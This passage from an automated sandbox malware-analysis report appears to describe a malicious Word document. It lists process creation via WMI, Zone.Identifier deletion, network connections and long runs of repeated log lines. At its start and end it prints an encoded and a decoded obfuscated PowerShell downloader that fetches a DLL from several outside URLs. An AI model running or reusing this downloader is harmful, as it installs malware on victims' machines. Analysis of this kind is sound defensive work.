wApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0014FED0 push edx; ret 7_2_0014FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00131155 push ecx; ret 7_2_00131156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001321EC pushad ; ret 7_2_00132200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00133391 push eax; iretd 7_2_001333AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00130C18 pushfd ; retf 7_2_00130C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001317A1 push ds; iretd 7_2_001317A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019FED0 push edx; ret 8_2_0019FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00181155 push ecx; ret 8_2_00181156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001821EC pushad ; ret 8_2_00182200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00183391 push eax; iretd 8_2_001833AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00180C18 pushfd ; retf 8_2_00180C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001817A1 push ds; iretd 8_2_001817A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020FED0 push edx; ret 9_2_0020FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1155 push ecx; ret 9_2_001F1156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F21EC pushad ; ret 9_2_001F2200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3391 push eax; iretd 9_2_001F33AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F0C18 pushfd ; retf 9_2_001F0C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F17A1 push ds; iretd 9_2_001F17A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0011FED0 push edx; ret 10_2_0011FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00101155 push ecx; ret 10_2_00101156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001021EC pushad ; ret 10_2_00102200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00103391 push eax; iretd 10_2_001033AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00100C18 pushfd ; retf 10_2_00100C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001017A1 push ds; iretd 10_2_001017A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0018FED0 push edx; ret 11_2_0018FFD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00171155 push ecx; ret 11_2_00171156
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001721EC pushad ; ret 11_2_00172200
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00173391 push eax; iretd 11_2_001733AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00170C18 pushfd ; retf 11_2_00170C19
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001717A1 push ds; iretd 11_2_001717A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0012FED0 push edx; ret 12_2_0012FFD4

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Psyzc\rrjb.eew:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zeompoyzkid\lbzryxyiwk.tgo:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fzcbciyn\hrzxfeb.tjx:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jbfsrfqgbfhitpby\uwgzghumsjobone.nsu:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ktcrhcwi\dlsvvuq.xcm:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lpubpgqoe\ouvofhit.lrs:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: 79a2gzs3gkk.docStream path 'word' entropy: 7.92981016152 (max. 8.0)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: powershell.exe, 00000005.00000002.2093673054.0000000000284000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h]7_2_1000A823
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 195.159.28.230 144
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.38.130.14 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SeT-vARiaBLe ("T4"+"Kd6") ( [Type]("{2}{3}{5}{0}{4}{1}" -F 're','rY','SY','sTe','ctO','m.Io.DI') ); SEt 428 ( [TYpe]("{3}{7}{0}{5}{6}{2}{4}{8}{1}"-f'EM.nET.','er','t','SYs','M','sERViCE','PoIN','t','aNag')) ; $Jrnzmks=$A16L + [char](33) + $Y11F;$M20M=('O1'+'8W'); (IteM ("VArIABlE:T4k"+"D"+"6") ).vAlUe::"CreAT`EdIReCt`Ory"($HOME + (('{0}'+'Snuvw2w{0'+'}V'+'46'+'51pz{0'+'}') -F[CHar]92));$E20V=(('B1'+'3')+'A'); $428::"sEcu`R`ityP`R`OTocol" = (('T'+'ls1')+'2');$E_9Q=(('G'+'91')+'N');$Wsxw52z = ('H'+('64'+'C'));$L04N=('V'+('16'+'F'));$Xdn5xhg=$HOME+(('{0}Snuvw'+'2w{0}V'+('465'+'1p')+'z{0}')-F[CHar]92)+$Wsxw52z+'.d' + 'll';$X28G=('W0'+'1E');$O338_77='h' + 'tt' + 'p';$Xap1lma=('x'+' '+('['+' sh b:'+'//')+('co'+'wor')+('k'+'ingpl')+'us'+'.'+('es'+'/w')+('p-a'+'dmin'+'/Fxm')+('ME'+'/')+'!'+'x'+' ['+' '+'sh'+(' 